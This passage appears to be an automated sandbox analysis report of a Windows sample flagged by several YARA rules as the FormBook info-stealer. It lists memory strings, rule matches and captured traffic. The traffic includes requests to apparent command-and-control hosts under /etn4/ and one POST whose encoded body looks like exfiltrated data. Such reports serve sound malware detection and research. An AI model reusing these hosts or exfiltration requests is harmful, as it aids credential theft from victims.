Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://fedoraproject.org/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://fontfabrik.com
Source: control.exe, 0000000D.00000002.645614968.0000000005496000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://funwave.info/etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf
Source: control.exe, 0000000D.00000002.645738782.000000000568E000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://nginx.net/
Source: control.exe, 0000000D.00000002.645688479.0000000005592000.00000004.10000000.00040000.00000000.sdmp String found in binary or memory: http://reprograme-se10x.com/etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: vbc.exe, 00000000.00000002.406494401.0000000001037000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.coma/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.goodfont.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.com
Source: vbc.exe, 00000000.00000003.367848176.000000000103D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sajatypeworks.comtpuKK
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sakkal.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.sandoll.co.kr
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.tiro.com
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.typography.netD
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.urwpp.deDPlease
Source: vbc.exe, 00000000.00000002.413010383.00000000069A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.zhongyicts.com.cn
Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: control.exe, 0000000D.00000003.605166525.00000000079F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/chrome/https://www.google.com/chrome/thank-you.htmlabout:blankhttps://adservi
Source: unknown HTTP traffic detected: POST /etn4/ HTTP/1.1Host: www.reprograme-se10x.comConnection: closeContent-Length: 418Cache-Control: no-cacheOrigin: http://www.reprograme-se10x.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.reprograme-se10x.com/etn4/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 52 76 74 35 78 54 68 3d 72 71 4e 69 46 4a 6b 64 61 44 65 48 31 48 6e 36 5a 44 61 75 49 38 72 58 79 4f 7e 46 63 6e 67 49 68 47 68 55 57 54 73 39 6a 38 74 57 4a 52 6d 45 45 5a 57 79 49 70 74 79 73 50 51 71 59 38 41 63 53 75 51 33 44 5f 78 5f 54 73 78 39 49 34 57 6e 62 58 67 45 71 57 77 67 4a 35 74 6c 65 55 6e 39 78 71 75 30 58 67 30 35 58 48 61 6a 4e 4f 63 49 6e 4e 64 58 59 6e 79 35 39 36 6a 41 66 30 55 33 77 4a 54 73 59 4d 35 4f 76 67 48 6a 52 68 32 48 49 68 73 30 78 32 50 56 71 38 62 50 31 57 76 66 52 47 36 41 4a 39 44 5f 38 57 6d 75 53 75 5a 49 75 5f 7a 63 36 78 38 79 74 69 46 79 56 6b 28 5a 63 34 39 78 6d 50 54 4a 6e 6b 6d 52 70 4f 35 68 78 5f 56 64 67 77 4b 78 6c 5a 32 71 6a 70 57 76 63 4e 4c 61 37 48 50 51 4c 6b 36 30 45 30 6c 36 47 62 55 43 41 2d 59 6a 72 31 44 47 76 39 58 32 49 66 67 6f 43 66 44 70 57 51 44 45 4c 77 37 42 6a 72 59 68 30 46 6b 67 46 57 53 4c 32 38 73 73 70 34 4f 37 5a 52 48 36 31 47 39 63 71 7a 61 76 30 4f 6a 44 31 48 35 65 46 57 52 41 33 38 46 61 53 6f 73 79 6e 5f 6d 51 74 61 54 2d 64 6e 59 7a 63 65 69 53 70 7a 65 42 73 35 4b 48 57 52 59 37 49 32 6f 76 49 47 58 47 62 70 39 31 34 73 5a 43 7e 46 38 34 51 47 62 66 44 42 52 39 7e 62 68 4a 44 4c 47 59 56 49 39 59 6f 50 56 43 56 72 72 52 52 75 52 41 64 55 6f 2e 00 00 00 00 00 00 00 00 Data Ascii: cRvt5xTh=rqNiFJkdaDeH1Hn6ZDauI8rXyO~FcngIhGhUWTs9j8tWJRmEEZWyIptysPQqY8AcSuQ3D_x_Tsx9I4WnbXgEqWwgJ5tleUn9xqu0Xg05XHajNOcInNdXYny596jAf0U3wJTsYM5OvgHjRh2HIhs0x2PVq8bP1WvfRG6AJ9D_8WmuSuZIu_zc6x8ytiFyVk(Zc49xmPTJnkmRpO5hx_VdgwKxlZ2qjpWvcNLa7HPQLk60E0l6GbUCA-Yjr1DGv9X2IfgoCfDpWQDELw7BjrYh0FkgFWSL28ssp4O7ZRH61G9cqzav0OjD1H5eFWRA38FaSosyn_mQtaT-dnYzceiSpzeBs5KHWRY7I2ovIGXGbp914sZC~F84QGbfDBR9~bhJDLGYVI9YoPVCVrrRRuRAdUo.
Source: unknown DNS traffic detected: queries for: www.funwave.info
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=Cta36k8ikZqurnipoxkRmmGd40Kya2aSborXxyuf+Fe+qece1yHxQlddjwwspvxEwVKtNXVfvaYDvAKdsC9znF0tof1OuukDyDlLohNqUsvE HTTP/1.1Host: www.funwave.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?cRvt5xTh=molCG9tOWGG77xzFdRevdPvUiNWpIWpi7GNNNgA2ifx3ZRGhVtKNJJVLj+R0F9QcWvNkIdZbD/ktNYP0MkMUr0Msa5tKdHW+1cW/UCZDWxnM&jDK=cFN0wh5pOr2lLXB HTTP/1.1Host: www.reprograme-se10x.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic HTTP traffic detected: GET /etn4/?jDK=cFN0wh5pOr2lLXB&cRvt5xTh=/R5Ku0REc5kTBOTK4FybjCic+J3HjscPDRicZMYanJDb3VFeXunUS1CfOY6dWIQDflcWbkgY3XkW9HfCwqM4rRtZZd8ZPm0cmGZ9eLaMCkCJ HTTP/1.1Host: www.tadeumilhosrp.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Uses 32bit PE files
Source: vbc.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 6.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.632823935.0000000002DD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.403522788.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.409203550.000000000397B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.463881212.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000000.484050905.000000000D63F000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.631975004.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000D.00000002.631553136.0000000000B90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: vbc.exe PID: 6088, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: vbc.exe PID: 5776, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: control.exe PID: 1272, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Detected potential crypto function
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265CD04 0_2_0265CD04
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_0265F0D0 0_2_0265F0D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_053741D0 0_2_053741D0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DF0 0_2_07095DF0
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955B8 0_2_070955B8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_070955C8 0_2_070955C8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096343 0_2_07096343
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07096FC8 0_2_07096FC8
Source: C:\Users\user\Desktop\vbc.exe Code function: 0_2_07095DE1 0_2_07095DE1
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015BF900 6_2_015BF900
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D4120 6_2_015D4120
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015D99BF 6_2_015D99BF
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0168E824 6_2_0168E824
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01671002 6_2_01671002
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA830 6_2_015DA830
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016828EC 6_2_016828EC
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016820A8 6_2_016820A8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015CB090 6_2_015CB090
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015E20A0 6_2_015E20A0
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DAB40 6_2_015DAB40
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_01682B28 6_2_01682B28
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015DA309 6_2_015DA309
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016623E3 6_2_016623E3
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EABD8 6_2_015EABD8
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_0167DBD2 6_2_0167DBD2
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_016703DA 6_2_016703DA
Source: C:\Users\user\Desktop\vbc.exe Code function: 6_2_015EEBB0 6_2_015EEBB0
